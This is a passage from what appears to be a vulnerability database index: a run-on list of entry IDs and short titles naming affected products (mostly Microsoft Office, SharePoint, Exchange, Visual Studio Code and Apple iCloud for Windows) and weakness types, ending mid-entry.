C:\WINDOWS\scanregs.exe backdoor [176028] Citrix Workspace App on Windows access control [175481] PuTTY up to 0.74 on Windows Title denial of service [174872] Microsoft Visual Studio up to 2019 Version 16.9 unknown vulnerability [174869] Microsoft Dynamics 365 for Finance and Operations unknown vulnerability [174860] Microsoft SharePoint Server 2013 SP1/2016/2019 information disclosure [174859] Microsoft SharePoint Server 2013 SP1/2016/2019 unknown vulnerability [174858] Microsoft SharePoint Server 2013 SP1/2016/2019 information disclosure [174857] Microsoft Office/Excel information disclosure [174856] Microsoft Office/Excel unknown vulnerability [174855] Microsoft Office unknown vulnerability [174854] Microsoft Office/Excel 365 Apps for Enterprise up to Online Server unknown vulnerability [174853] Microsoft Office/Excel information disclosure [174852] Microsoft Office/Excel unknown vulnerability [174851] Microsoft Office/Word Graphics unknown vulnerability [174850] Microsoft SharePoint Server 2013 SP1/2016/2019 unknown vulnerability [174838] Microsoft Exchange Server 2013 CU23/2016 CU19/2016 CU20/2019 CU8/2019 CU9 unknown vulnerability [174837] Microsoft Exchange Server 2013 CU23/2016 CU19/2016 CU20/2019 CU8/2019 CU9 unknown vulnerability [174836] Microsoft .NET/Visual Studio unknown vulnerability [174834] Microsoft Exchange Server 2013 CU23/2016 CU19/2016 CU20/2019 CU8/2019 CU9 unknown vulnerability [174832] Microsoft Exchange Server 2013 CU23/2016 CU16/2016 CU20/2019 CU8/2019 CU9 unknown vulnerability [174831] Microsoft Visual Studio Code unknown vulnerability [174830] Microsoft Visual Studio Code Remote Containers Extension unknown vulnerability [174829] Microsoft Visual Studio Code unknown vulnerability [174828] Microsoft Lync Server/Skype for Business Server 2013 CU10/2015 CU11 unknown vulnerability [174827] Microsoft Lync/Skype for Business Server 2013 CU10/2015 CU11/2019 CU5 unknown vulnerability [174825] Microsoft SharePoint Server 2013 SP1/2016/2019 unknown vulnerability [174823] Microsoft SharePoint Server 2013 SP1/2016/2019 unknown vulnerability [174822] Microsoft SharePoint Server 2013 SP1/2016/2019 unknown vulnerability [174820] Microsoft Accessibility Insights for Web information disclosure [174540] Dell EMC Integrated System for Microsoft Azure Stack Hub up to 2011 hard-coded credentials [174247] Aviatrix VPN Client up to 2.14.13 on Windows unquoted search path [174028] Apple macOS up to 11.2.3 Windows Server permission [173303] NVIDIA Windows GPU Display Driver R390 on Windows Installer unknown vulnerability [173302] NVIDIA Windows GPU Display Driver on Windows Kernel Driver nvlddmkm.sys null pointer dereference [173301] NVIDIA Windows GPU Display Driver on Windows Kernel Mode Layer nvlddmkm.sys DxgkDdiEscape unknown vulnerability [173271] NVIDIA GPU Display Driver R450/R460 on Windows/Linux Reference denial of service [173251] NVIDIA GPU Display Driver on Windows/Linux Kernel Mode Layer nvlddmkm.sys unknown vulnerability [173176] HEUR.Backdoor.Win32.Generic Service Port 1080 C:\WINDOWS\1314.exe backdoor [172951] Microsoft Azure DevOps Server/Team Foundation Server information disclosure [172871] Microsoft Kubernetes Tools on Visual Studio unknown vulnerability [172870] Microsoft Office 365 Apps for Enterprise up to 2019 Excel unknown vulnerability [172869] Microsoft SharePoint 2010 SP2/2013 SP1/2016/2019 Update denial of service [172868] Microsoft Office Excel unknown vulnerability [172867] Microsoft Outlook memory corruption [172866] Microsoft Word/Office/SharePoint unknown vulnerability [172865] Microsoft Office Excel unknown vulnerability [172863] Microsoft Visual Studio Code unknown vulnerability [172861] Microsoft Azure DevOps Server 2020.0.1 unknown vulnerability [172859] Microsoft Visual Studio Code unknown vulnerability [172858] Microsoft GitHub Pull Requests and Issues Extension on Visual Studio unknown vulnerability [172857] Microsoft Visual Studio Code Remote Development Extension unknown vulnerability [172856] Microsoft Maven for Java Extension on Visual Studio unknown vulnerability [172855] Microsoft Visual Studio Code unknown vulnerability [172854] Microsoft Visual Studio Code unknown vulnerability [172853] Microsoft Exchange Server 2013 CU23/2016 CU20/2019 CU9 unknown vulnerability [172852] Microsoft Exchange Server 2013 CU23/2016 CU20/2019 CU9 unknown vulnerability [172851] Microsoft Exchange Server 2013 CU23/2016 CU20/2019 CU9 unknown vulnerability [172850] Microsoft Exchange Server 2013 CU23/2016 CU20/2019 CU9 unknown vulnerability [172844] Microsoft Visual Studio Code unknown vulnerability [172739] Zoom Chat up to 2021-04-09 on Windows/macOS unknown vulnerability [172680] Dolby Audio X2 API on Windows unknown vulnerability [172627] Cisco Advanced Malware Protection/Immunet on Windows DLL Loader uncontrolled search path [172514] MongoDB Compass up to 1.2.x/1.24.x on Windows privileges management [171498] PostgreSQL 11.0/11.1/11.2 Windows Installer access control [171497] PostgreSQL 11.0/11.1/11.2 Windows Installer access control [171261] SSH Tectia Client up to 6.4.18 on Windows ConnectSecure privileges management [171260] SSH Tectia Client up to 6.4.18 on Windows ConnectSecure privileges management [171259] SSH Tectia Client up to 6.4.18 on Windows ConnectSecure entropy [170987] Microsoft Visual Studio Code unknown vulnerability [170986] Microsoft Visual Studio Code Java Extension Pack unknown vulnerability [170985] Microsoft Visual Studio Code ESLint Extension unknown vulnerability [170982] Microsoft Visual Studio Code Remote Containers Extension unknown vulnerability [170974] Microsoft SharePoint Server/Office Web Apps 2010 SP2/2013 SP1/2016/2019 unknown vulnerability [170973] Microsoft SharePoint Server/Office Web Apps 2016/2019 information disclosure [170972] Microsoft Office 365 Apps for Enterprise up to 2019 PowerPoint unknown vulnerability [170971] Microsoft Power BI Report Server 15.0.1103.234/15.0.1104.300 information disclosure [170970] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1/2016 unknown vulnerability [170969] Microsoft Office 365 Apps for Enterprise up to Web Apps 2013 SP1 unknown vulnerability [170968] Microsoft Office 365 Apps for Enterprise up to 2019 unknown vulnerability [170959] Microsoft Office Excel unknown vulnerability [170958] Microsoft Office Excel unknown vulnerability [170945] Microsoft Visual Studio 2017 Version 15.9/2019 Version 16.9 Git link following [170910] Microsoft Azure Spring Cloud information disclosure [170596] Microsoft Exchange Server 2013 CU23/2016 CU18/2016 CU19/2019 CU7/2019 CU8 unknown vulnerability [170595] Microsoft Exchange Server 2013 CU23/2016 CU18/2016 CU19/2019 CU7/2019 CU8 unknown vulnerability [170594] Microsoft Exchange Server 2013 CU23/2016 CU18/2016 CU19/2019 CU7/2019 CU8 unknown vulnerability [170593] Microsoft Exchange Server 2013 CU23/2016 CU18/2016 CU19/2019 CU7/2019 CU8 unknown vulnerability [170592] Microsoft Exchange Server 2013 CU23/2016 CU18/2016 CU19/2019 CU7/2019 CU8 unknown vulnerability [170591] Microsoft Exchange Server 2013 CU23/2016 CU18/2016 CU19/2019 CU7/2019 CU8 unknown vulnerability [170590] Microsoft Exchange Server 2013 CU23/2016 CU18/2016 CU19/2019 CU7/2019 CU8 unknown vulnerability [170102] Cisco AnyConnect Secure Mobility Client on Windows Interprocess Communication uncontrolled search path [169953] Nagios XI 5.7.5 HTTP Request windowswmi.inc.php os command injection [169911] F5 BIG-IP APM Client Troubleshooting Utility up to 7.1.8.4/7.1.9.7/7.2.1.0 on Windows Edge Client untrusted search path [169508] Microsoft Visual Studio Code npm-script Extension unknown vulnerability [169507] Microsoft Visual Studio up to 2017 15.9/2019 16.8 unknown vulnerability [169504] Microsoft Lync Server/Skype for Business Server denial of service [169503] Microsoft Lync Server/Skype for Business Server unknown vulnerability [169496] Microsoft Teams on iOS information disclosure [169495] Microsoft SharePoint 2013 SP1/2016/2019 unknown vulnerability [169494] Microsoft SharePoint 2010 SP2/2013 SP1/2016/2019 unknown vulnerability [169493] Microsoft SharePoint 2010 SP2/2013 SP1/2016/2019 unknown vulnerability [169492] Microsoft SharePoint 2010 SP2/2013 SP1/2016/2019 information disclosure [169491] Microsoft Office unknown vulnerability [169490] Microsoft Office unknown vulnerability [169489] Microsoft Office unknown vulnerability [169488] Microsoft Office unknown vulnerability [169486] Microsoft Exchange Server 2016 CU18/2019 CU7 unknown vulnerability [169485] Microsoft Exchange Server 2016 CU18/2016 CU19/2019 CU7/2019 CU8 unknown vulnerability [169481] Microsoft Azure Kubernetes Service unknown vulnerability [169478] Microsoft .NET Framework 4.6 up to 4.8 denial of service [169477] Microsoft .NET Core/Visual Studio denial of service [169178] SolarWinds Serv-U up to 15.2.1 on Windows Home Directory permission [169027] Cloudflare WARP on Windows unquoted search path [168806] Apple iCloud up to 11.5 on Windows ImageIO out-of-bounds read [168805] Apple iCloud up to 11.5 on Windows ImageIO out-of-bounds read [168804] Apple iCloud up to 11.5 on Windows ImageIO out-of-bounds read [168803] Apple iCloud up to 11.5 on Windows ImageIO out-of-bounds write [168758] Google Go up to 1.14.13/1.15.6 on Windows Fetch Module command injection [168122] Backdoor.Win32.Whisper.b Service Port 113 C:\Windows\rundll32.exe stack-based overflow [167993] Apache Tomcat up to 7.0.106/8.5.59/9.0.39/10.0.0-M9 on Windows NTFS File System File.getCanonicalPath information disclosure [167778] SAP NetWeaver Master Data Management 7.10/710/750 on Windows information disclosure [167666] Microsoft Visual Studio 2017 Version 15.9/2019 Version 16.8 cross site scripting [167653] Microsoft Word unknown vulnerability [167652] Microsoft Word out-of-bounds write [167650] Microsoft SharePoint Server 2013 SP1/2016/2019 input validation [167649] Microsoft SharePoint Server 2013 SP1/2016/2019 input validation [167648] Microsoft SharePoint Foundation 2010 SP2 unknown vulnerability [167647] Microsoft SharePoint Server 2010 SP2/2013 SP1/2016/2019 unknown vulnerability [167646] Microsoft SharePoint Server 2016/2019 privileges management [167645] Microsoft SharePoint Server 2013 SP/2016/2019 privileges management [167644] Microsoft SQL Server 2012 SP4/2014 SP3/2016 SP2/2017 CU22/2019 CU8 sql injection [167643] Microsoft Office 365 Apps for Enterprise up to 2019 unknown vulnerability [167642] Microsoft Excel unknown vulnerability [167641] Microsoft Excel memory corruption [167627] Microsoft ASP.NET Core/Visual Studio denial of service [167473] Backdoor.Win32.Ketch.b HTTP GET Request c:\Windows\watchb.tmp buffer overflow [167427] Backdoor.Win32.NinjaSpy.c HTTP PUT C:\WINDOWS\cmd.dll buffer overflow [167318] Veritas NetBackup/OpsCenter up to 8.3.0.1 on Windows OpenSSL Library permission [167312] Veritas NetBackup/OpsCenter up to 8.3.0.1 on Windows permission [167311] Veritas CloudPoint on Windows Windows Agent openssl.cnf permission [161959] Apple iCloud up to 11.3 on Windows WebKit Universal cross site scripting [161744] Cisco WebEx Network Recording Player/Webex Player on Windows ARF File memory corruption [161743] Cisco WebEx Network Recording Player/Webex Player on Windows ARF File memory corruption [161742] Cisco WebEx Network Recording Player/Webex Player on Windows ARF File memory corruption [161297] PostgreSQL up to 12 on Windows Installer privilege escalation [160966] Microsoft SQL Server 2017/2019 Reporting Services privilege escalation [160964] Microsoft Visual Studio Code JSON privilege escalation [160953] Microsoft Visual Studio memory corruption [160952] Microsoft Office 2016/2019 on macOS information disclosure [160945] Microsoft Excel up to 2019 memory corruption [160941] Microsoft SharePoint Server 2013 SP1 cross site scripting [160938] Microsoft SharePoint Server 2019 Profile Data privilege escalation [160937] Microsoft SharePoint Server 2013 SP1/2016/2019 cross site scripting [160933] Microsoft SharePoint Server 2010 SP2/2013 SP1/2016/2019 cross site scripting [160931] Microsoft SharePoint Server 2010 SP2/2013 SP1/2016/2019 Profile Data privilege escalation [160929] Microsoft SharePoint Server 2010 SP2/2013 SP1/2016/2019 cross site scripting [160928] Microsoft Office Word privilege escalation [160927] Microsoft Excel up to 2019 memory corruption [160926] Microsoft Office up to 2019 Excel memory corruption [160919] Microsoft SharePoint Server 2013 SP1/2016/2019 cross site scripting [160918] Microsoft SharePoint Server Excel information disclosure [160917] Microsoft Office Word privilege escalation [160916] Microsoft SharePoint Server 2010 SP2/2013 SP1/2016/2019 privilege escalation [160915] Microsoft SharePoint Server 2013 SP1/2016/2019 cross site scripting [160914] Microsoft Office up to 2019 Excel memory corruption [160859] Microsoft Visual Studio privilege escalation [160857] Microsoft Dynamics 365 for Finance/Operations 10.0.11 privilege escalation [160856] Microsoft SharePoint Server 2013 SP1/2016/2019 API information disclosure [160854] Microsoft SharePoint Server 2010 SP2/2013 SP1/2016/2019 Markup information disclosure [160852] Microsoft SharePoint Enterprise Server 2010 SP2/2013 SP1/2016/2019 ASP.Net Web Control privilege escalation [160851] Microsoft SharePoint Server 2010 SP2/2013 SP1/2016/2019 Markup information disclosure [160850] Microsoft SharePoint Server 2010 SP2/2013 SP1/2016/2019 Markup information disclosure [160846] Microsoft SharePoint Server 2010 SP2/2013 SP1/2016/2019 Markup information disclosure [160845] Microsoft SharePoint Server 2010 SP2/2013 SP1/2016/2019 Markup information disclosure [160590] Trend Micro OfficeScan XG SP1 on Windows privilege escalation [160103] Cisco Webex Meetings Desktop App on Windows directory traversal [159979] Microsoft Dynamics 365 for Finance/Operations 10.0.11 privilege escalation [159890] Apple iCloud up to 11.2 on Windows WebKit Page Loading weak authentication [159889] Apple iCloud up to 11.2 on Windows WebKit privilege escalation [159888] Apple iCloud up to 11.2 on Windows WebKit memory corruption [159887] Apple iCloud up to 11.2 on Windows WebKit memory corruption [159886] Apple iCloud up to 11.2 on Windows WebKit Universal cross site scripting [159885] Apple iCloud up to 11.2 on Windows WebKit CSP privilege escalation [159884] Apple iCloud up to 11.2 on Windows WebKit memory corruption [159883] Apple iCloud up to 11.2 on Windows ImageIO Integer Coercion Error [159882] Apple iCloud up to 11.2 on Windows ImageIO memory corruption [159881] Apple iCloud up to 11.2 on Windows ImageIO memory corruption [159880] Apple iCloud up to 11.2 on Windows ImageIO memory corruption [159879] Apple iCloud up to 11.2 on Windows ImageIO memory corruption [159878] Apple iCloud up to 11.2 on Windows ImageIO memory corruption [159877] Apple iCloud up to 11.2 on Windows ImageIO memory corruption [159876] Apple iCloud up to 11.2 on Windows ImageIO memory corruption [159875] Apple iCloud up to 11.2 on Windows ImageIO memory corruption [159874] Apple iCloud up to 11.2 on Windows ImageIO memory corruption [159873] Apple iCloud up to 11.2 on Windows ImageIO memory corruption [159872] Apple iCloud up to 11.2 on Windows ImageIO memory corruption [159870] Apple iCloud up to 7.19 on Windows WebKit Page Loading weak authentication [159869] Apple iCloud up to 7.19 on Windows WebKit privilege escalation [159868] Apple iCloud up to 7.19 on Windows WebKit memory corruption [159867] Apple iCloud up to 7.19 on Windows WebKit memory corruption [159866] Apple iCloud up to 7.19 on Windows WebKit Universal cross site scripting [159865] Apple iCloud up to 7.19 on Windows WebKit CSP privilege escalation [159864] Apple iCloud up to 7.19 on Windows WebKit memory corruption [159863] Apple iCloud up to 7.19 on Windows ImageIO Integer Coercion Error [159862] Apple iCloud up to 7.19 on Windows ImageIO memory corruption [159861] Apple iCloud up to 7.19 on Windows ImageIO memory corruption [159860] Apple iCloud up to 7.19 on Windows ImageIO memory corruption [159859] Apple iCloud up to 7.19 on Windows ImageIO memory corruption [159858] Apple iCloud up to 7.19 on Windows ImageIO memory corruption [159857] Apple iCloud up to 7.19 on Windows ImageIO memory corruption [159856] Apple iCloud up to 7.19 on Windows ImageIO memory corruption [159855] Apple iCloud up to 7.19 on Windows ImageIO memory corruption [159854] Apple iCloud up to 7.19 on Windows ImageIO memory corruption [159853] Apple iCloud up to 7.19 on Windows ImageIO memory corruption [159852] Apple iCloud up to 7.19 on Windows ImageIO memory corruption [159613] Microsoft SQL Server Management Studio 18.6 privilege escalation [159611] Microsoft SharePoint Enterprise Server/SharePoint Server privilege escalation [159609] Microsoft SharePoint Foundation cross site scripting [159607] Microsoft Visual Studio Code Environment Variable privilege escalation [159606] Microsoft Excel up to 2019 memory corruption [159602] Microsoft SharePoint Foundation privilege escalation [159599] Microsoft Excel up to 2019 information disclosure [159598] Microsoft Office 365 Apps for Enterprise/2013 C2R/2019 privilege escalation [159596] Microsoft Excel 2010 SP2 memory corruption [159586] Microsoft SharePoint Foundation privilege escalation [159578] Microsoft Outlook up to 2019 information disclosure [159577] Microsoft Word 365 Apps for Enterprise/2019 information disclosure [159576] Microsoft Excel memory corruption [159575] Microsoft SharePoint Foundation information disclosure [159569] Microsoft Word up to 2019 information disclosure [159565] Microsoft SharePoint Foundation Office cross site scripting [159549] Microsoft Word up to 2019 information disclosure [159547] Microsoft Excel up to 2019 memory corruption [159544] Microsoft Excel up to 2019 memory corruption [159538] Microsoft Office memory corruption [159533] Microsoft Access memory corruption [159514] Microsoft .NET Framework up to 4.8 Cache File privilege escalation [159510] Microsoft .NET Framework 2.0 SP2/3.5/3.5.1/4.7.2/4.8 privilege escalation [159498] Microsoft Office/Outlook/365 Apps for Enterprise memory corruption [159000] Citrix Workspace App 1912 CU1/2006.1 on Windows Automatic Updater Service privilege escalation [157967] Microsoft Visual Studio Code ESLint Extension privilege escalation [157965] Microsoft Lync/Skype for Business Server/SharePoint OAuth Token privilege escalation [157912] Microsoft SharePoint 2010 SP2/2013 SP1/2016/2019 cross site scripting [157911] Microsoft SharePoint 2013 SP1/2016/2019 Email Parser privilege escalation [157910] Microsoft SharePoint 2010 SP2/2013 SP1/2016/2019 cross site scripting [157909] Microsoft SharePoint 2013 SP1/2016/2019 privilege escalation [157908] Microsoft Office/SharePoint information disclosure [157907] Microsoft SharePoint 2016/2019 cross site scripting [157906] Microsoft SharePoint 2010 SP2/2013 SP1/2016/2019 Office cross site scripting [157905] Microsoft Office/SharePoint Word memory corruption [157904] Microsoft Office/SharePoint Word memory corruption [157903] Microsoft Office/Project Markup File Origin Validation Error [157902] Microsoft Office Online Server/Office Web Apps cross site scripting [157899] Microsoft SharePoint 2010 SP2/2013 SP1/2016/2019 PerformancePoint Services privilege escalation [157898] Microsoft Outlook up to 2019 memory corruption [157897] Microsoft Office/SharePoint Word memory corruption [157896] Microsoft Office/SharePoint information disclosure [157877] Microsoft Azure DevOps Server 2019 Update 1/2019 Update 1.1/2019.0.1 cross site scripting [156389] Microsoft Visual Studio Code Live Share Extension information disclosure [156338] Microsoft SharePoint Foundation cross site scripting [156337] Microsoft SharePoint Foundation cross site scripting [156336] Microsoft SharePoint Foundation privilege escalation [156335] Microsoft SharePoint Foundation cross site scripting [156334] Microsoft SharePoint Foundation Redirect [156333] Microsoft SharePoint Foundation cross site scripting [156332] Microsoft SharePoint Foundation privilege escalation [156331] Microsoft SharePoint Foundation cross site scripting [156330] Microsoft SharePoint Foundation cross site scripting [156329] Microsoft SharePoint Foundation cross site scripting [156328] Microsoft SharePoint Foundation ASP.Net Web Control privilege escalation [156327] Microsoft SharePoint Foundation 2010 SP2 cross site scripting [156326] Microsoft Project information disclosure [156325] Microsoft Office memory corruption [156324] Microsoft Office up to 2019 for Mac Outlook information disclosure [156323] Microsoft Excel up to 2019 for Mac memory corruption [156322] Microsoft Excel up to 2019 for Mac memory corruption [156299] Microsoft Azure DevOps Server 2019 Update 1/2019 Update 1.1 privilege escalation [156298] Microsoft Bing Search on Android weak authentication [156297] Microsoft Word on Android privilege escalation [155805] Apple iCloud up to 7.18/11.1 on Windows WebKit memory corruption [155804] Apple iCloud up to 7.18/11.1 on Windows WebKit cross site scripting [155803] Apple iCloud up to 7.18/11.1 on Windows WebKit privilege escalation [155802] Apple iCloud up to 7.18/11.1 on Windows WebKit memory corruption [155801] Apple iCloud up to 7.18/11.1 on Windows WebKit memory corruption [155800] Apple iCloud up to 7.18/11.1 on Windows WebKit privilege escalation [155799] Apple iCloud up to 7.18/11.1 on Windows WebKit Universal cross site scripting [155798] Apple iCloud up to 7.18/11.1 on Windows WebKit privilege escalation [155796] Apple iCloud up to 7.18/11.1 on Windows ImageIO information disclosure [155795] Apple iCloud up to 7.18/11.1 on Windows ImageIO memory corruption [155794] Apple iCloud up to 7.18/11.1 on Windows ImageIO memory corruption [155164] Microsoft Power BI Report Server privilege escalation [155163] Microsoft Visual Studio Code Python Extension privilege escalation [155159] Microsoft Visual Studio/ASP.NET Core privilege escalation [155125] Microsoft .NET Core/.NET Framework denial of service [155124] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 cross site scripting [155123] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 cross site scripting [155122] Microsoft SharePoint Enterprise Server 2013 SP1/2016 cross site scripting [155121] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 cross site scripting [155120] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 cross site scripting [155119] Microsoft SharePoint Enterprise Server 2010 SP2/2013 SP1/2016/2019 cross site scripting [155118] Microsoft SharePoint Enterprise Server 2016/2019 cross site scripting [155098] Microsoft .NET Framework 3.0 SP2/3.5.1 privilege escalation [155083] Microsoft Excel memory corruption [155082] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 information disclosure [155081] Microsoft Visual Studio Code Python Extension privilege escalation [155070] Microsoft SharePoint Enterprise Server 2016/2019 Source Markup privilege escalation [155069] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 ASP.Net Web Control memory corruption [155068] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 Source Markup privilege escalation [155067] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 Source Markup privilege escalation [155040] F5 BIG-IP Edge Client 7.1.5/7.1.6/7.1.7/7.1.8/7.1.9 on Windows ActiveX Component memory corruption [154622] Handy Groupware 1.7.3.1 on Windows ActiveX Control HShell.dll ShellExec privilege escalation [154327] HPE Onboard Administrator 4.95 on Linux/Windows Reflected cross site scripting [154022] Aviatrix OpenVPN Client up to 2.5.7 on Linux/macOS/Windows OpenSSL Parameter privilege escalation [153744] Intel PROSet/Wireless WiFi up to 21.69 on Windows 10 Kernel Mode Driver memory corruption [153285] Microsoft Research JavaScript Cryptography Library 1.4 ECC Incorrect Calculation [153271] Microsoft Forefront Endpoint Protection MpSigStub.exe privilege escalation [153262] Microsoft Office 365 ProPlus/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [153254] Microsoft Office/SharePoint/Word 2010 SP2/2013 RT SP1/2013 SP1/2016/2019 memory corruption [153253] Microsoft Office 365 ProPlus Excel memory corruption [153252] Microsoft SharePoint Enterprise Server cross site scripting [153251] Microsoft SharePoint Enterprise Server privilege escalation [153250] Microsoft privilege escalation [153249] Microsoft SharePoint Enterprise Server privilege escalation [153248] Microsoft SharePoint Enterprise Server cross site scripting [153247] Microsoft SharePoint Enterprise Server privilege escalation [153246] Microsoft SharePoint Enterprise Server Application Package privilege escalation [153242] Microsoft Office up to 2019 Access Connectivity Engine memory corruption [153238] Microsoft SharePoint Enterprise Server cross site scripting [153222] Microsoft SharePoint Enterprise Server cross site scripting [153221] Microsoft SharePoint Enterprise Server cross site scripting [153220] Microsoft SharePoint Enterprise Server cross site scripting [153219] Microsoft SharePoint Enterprise Server cross site scripting [153218] Microsoft SharePoint Enterprise Server cross site scripting [153217] Microsoft SharePoint Enterprise Server cross site scripting [153216] Microsoft SharePoint Enterprise Server Source Markup privilege escalation [153211] Microsoft Office/Excel/Office 365 memory corruption [153210] Microsoft Visual Studio up to 2019 Version 16.5 Extension Installer Service privilege escalation [153209] Microsoft Visual Studio 2017 15.9/2019 16.0/2019 16.4/2019 16.5 Updater Service privilege escalation [153194] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1/2016/2019 privilege escalation [153192] Microsoft SharePoint Enterprise Server/SharePoint Server Application Package privilege escalation [153186] Microsoft SharePoint Enterprise Server/SharePoint Server cross site scripting [153179] Microsoft SharePoint Enterprise Server Application Package privilege escalation [153178] Microsoft SharePoint Enterprise Server Application Package privilege escalation [153177] Microsoft SharePoint Enterprise Server Application Package privilege escalation [152629] Apple iCloud up to 7.17 on Windows WebKit Page Loading Incorrect Control Flow [152628] Apple iCloud up to 7.17 on Windows WebKit cross site scripting [152627] Apple iCloud up to 7.17 on Windows WebKit denial of service [152626] Apple iCloud up to 7.17 on Windows WebKit privilege escalation [152625] Apple iCloud up to 7.17 on Windows WebKit memory corruption [152624] Apple iCloud up to 7.17 on Windows WebKit race condition [152623] Apple iCloud up to 7.17 on Windows WebKit memory corruption [152622] Apple iCloud up to 7.17 on Windows WebKit memory corruption [152621] Apple iCloud up to 7.17 on Windows WebKit privilege escalation [152620] Apple iCloud up to 7.17 on Windows WebKit privilege escalation [152619] Apple iCloud up to 7.17 on Windows libxml2 memory corruption [152618] Apple iCloud up to 7.17 on Windows libxml2 memory corruption [152617] Apple iCloud up to 7.17 on Windows libxml2 memory corruption [152616] Apple iCloud up to 10.9.2 on Windows WebKit Page Loading Incorrect Control Flow [152615] Apple iCloud up to 10.9.2 on Windows WebKit cross site scripting [152614] Apple iCloud up to 10.9.2 on Windows WebKit denial of service [152613] Apple iCloud up to 10.9.2 on Windows WebKit memory corruption [152612] Apple iCloud up to 10.9.2 on Windows WebKit privilege escalation [152611] Apple iCloud up to 10.9.2 on Windows WebKit race condition [152610] Apple iCloud up to 10.9.2 on Windows WebKit memory corruption [152609] Apple iCloud up to 10.9.2 on Windows WebKit memory corruption [152608] Apple iCloud up to 10.9.2 on Windows WebKit privilege escalation [152607] Apple iCloud up to 10.9.2 on Windows WebKit privilege escalation [152606] Apple iCloud up to 10.9.2 on Windows libxml2 memory corruption [152605] Apple iCloud up to 10.9.2 on Windows libxml2 memory corruption [152604] Apple iCloud up to 10.9.2 on Windows libxml2 memory corruption [152283] Serendipity up to 2.3.3 on Windows privilege escalation [151931] signotec signoPAD-API-Web up to 3.1.0 on Windows WebSocket privilege escalation [151173] Microsoft Exchange Server 2016 CU14/2016 CU15/2019 CU3/2019 CU4 cross site scripting [151168] Microsoft SharePoint Enterprise Server cross site scripting [151167] Microsoft SharePoint Enterprise Server cross site scripting [151166] Microsoft Office 365 ProPlus/2010 SP2/2013 SP1/2016/2019 Word memory corruption [151165] Microsoft SharePoint Enterprise Server cross site scripting [151162] Microsoft Visual Studio up to 2017 Version 15.9/2019 version 16.4 weak encryption [151130] Microsoft Azure DevOps Server 2019 Update 1.1 Pipeline Job Token privilege escalation [151117] Microsoft Business Productivity Servers cross site scripting [151114] Microsoft Visual Studio up to 2019 Version 16.4 Extension Installer Service privilege escalation [151093] Microsoft Azure DevOps Server/Team Foundation Server Pipeline Job Token privilege escalation [151092] Microsoft Azure DevOps Server/Team Foundation Server cross site scripting [151090] Microsoft IIS privilege escalation [151089] Microsoft Office 365 ProPlus/2019 for Mac Word memory corruption [151088] Microsoft Office 2016 for Mac/2019/Online Server Word memory corruption [151087] Microsoft Office 365 ProPlus/2016 for Mac Word memory corruption [151086] Microsoft Office 365 ProPlus/2013 RT SP1/2013 SP1/2016/2019 Word memory corruption [150860] Cisco WebEx Network Recording Player/Webex Player on Windows privilege escalation [150859] Cisco WebEx Network Recording Player/Webex Player on Windows privilege escalation [150766] Apple iCloud on Windows CoreCrypto denial of service [150765] Apple iCloud on Windows CoreCrypto denial of service [150715] PHP up to 7.3.14/7.4.2 on Windows PHAR File information disclosure [150694] Apple iCloud up to 10.9.1 on Windows WebKit Page Loading memory corruption [150692] Apple iCloud up to 10.9.1 on Windows WebKit memory corruption [150691] Apple iCloud up to 10.9.1 on Windows WebKit memory corruption [150690] Apple iCloud up to 10.9.1 on Windows WebKit memory corruption [150689] Apple iCloud up to 10.9.1 on Windows WebKit Universal cross site scripting [150688] Apple iCloud up to 10.9.1 on Windows libxml2 privilege escalation [150687] Apple iCloud up to 10.9.1 on Windows ImageIO information disclosure [150614] Apple iCloud up to 7.16 on Windows WebKit Page Loading DOM-Based memory corruption [150613] Apple iCloud up to 7.16 on Windows WebKit memory corruption [150612] Apple iCloud up to 7.16 on Windows WebKit memory corruption [150611] Apple iCloud up to 7.16 on Windows WebKit memory corruption [150610] Apple iCloud up to 7.16 on Windows WebKit Universal cross site scripting [150609] Apple iCloud up to 7.16 on Windows libxml2 privilege escalation [150608] Apple iCloud up to 7.16 on Windows ImageIO information disclosure [150052] IBM Cloud CLI up to 0.16.1 Windows Installer weak authentication [149969] Microsoft SharePoint Enterprise Server 2013 SP1/2016/2019 cross site scripting [149968] Microsoft Office up to 2019 Excel memory corruption [149918] Microsoft Office 365 ProPlus OLicenseHeartbeat privilege escalation [149917] Microsoft Office up to 2019 Security Feature privilege escalation [149916] Microsoft Office Online Server privilege escalation [149915] Microsoft SharePoint Enterprise Server 2013 P1/2016/2019 cross site scripting [149914] Microsoft Exchange Server 2013 CU23/2016 CU14/2016 CU15/2019 CU3/2019 CU4 Exchange Web Services privilege escalation [149507] CPython up to 3.8.1 on Windows 7 Dependency Load api-ms-win-core-path-l1-1-0.dll privilege escalation [149361] Cisco Webex Teams Client on Windows denial of service [149313] Microsoft Outlook on Android Email privilege escalation [148624] Microsoft .NET Framework up to 4.8 privilege escalation [148623] Microsoft .NET Core/.NET Framework Source Markup File privilege escalation [148622] Microsoft .NET Core/.NET Framework Source Markup File privilege escalation [148619] Microsoft Office 365 ProPlus Excel memory corruption [148618] Microsoft Office up to 2019 for Mac memory corruption [148617] Microsoft Excel up to 2019 for Mac memory corruption [148616] Microsoft Excel up to 2019 for Mac memory corruption [148615] Microsoft Office Online Server privilege escalation [148306] cURL up to 7.67.x on Windows File privilege escalation [147595] PHP up to 7.3.12 on Windows Header mail memory corruption [147591] PHP up to 7.2.25/7.3.12 on Windows Filename link memory corruption [147443] Apple iCloud 7.13/10.6 on Windows memory corruption [147439] Apple iCloud 7.13/10.6 on Windows Text File information disclosure [147436] Apple iCloud 7.13/10.6 on Windows memory corruption [147434] Apple iCloud 7.13/10.6 on Windows memory corruption [147432] Apple iCloud 7.13/10.6 on Windows memory corruption [147430] Apple iCloud 7.13/10.6 on Windows State Management Universal cross site scripting [147427] Apple iCloud 7.13/10.6 on Windows memory corruption [147425] Apple iClouds 7.13/10.6 on Windows State Management Universal cross site scripting [147033] Microsoft Visual Studio Git privilege escalation [147032] Microsoft Visual Studio Git privilege escalation [147031] Microsoft Visual Studio Git privilege escalation [147030] Microsoft Visual Studio Git privilege escalation [147029] Microsoft Visual Studio Git privilege escalation [147028] Microsoft Visual Studio Git privilege escalation [146927] Microsoft 